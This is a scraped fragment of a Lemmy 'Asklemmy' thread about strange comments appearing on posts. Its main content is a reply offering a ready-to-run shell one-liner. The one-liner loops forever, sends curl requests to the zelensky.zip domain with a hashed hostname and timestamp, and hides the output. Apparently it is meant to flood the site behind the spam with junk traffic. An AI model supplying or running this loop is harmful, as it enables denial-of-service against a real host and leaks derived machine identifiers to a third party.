Fleecer74@lemmy.sdf.org to Asklemmy · 1 year agoWhat are these comments on lemmy posts?lemmy.sdf.orgimagemessage-square83fedilinkarrow-up1262arrow-down17file-text
arrow-up1255arrow-down1imageWhat are these comments on lemmy posts?lemmy.sdf.orgFleecer74@lemmy.sdf.org to Asklemmy · 1 year agomessage-square83fedilinkfile-text
minus-squaregandalftheBlacklinkfedilinkarrow-up4·edit-21 year agoHere’s the one where it uses epoch time (better randomization) and also hides the output of curl while true; do curl https://zelensky.zip/save/$(echo $(hostname) $(date +%s) | shasum | sed 's/.\{3\}$//' | base64) &> /dev/null ; echo "done."; done
Here’s the one where it uses epoch time (better randomization) and also hides the output of curl
while true; do curl https://zelensky.zip/save/$(echo $(hostname) $(date +%s) | shasum | sed 's/.\{3\}$//' | base64) &> /dev/null ; echo "done."; done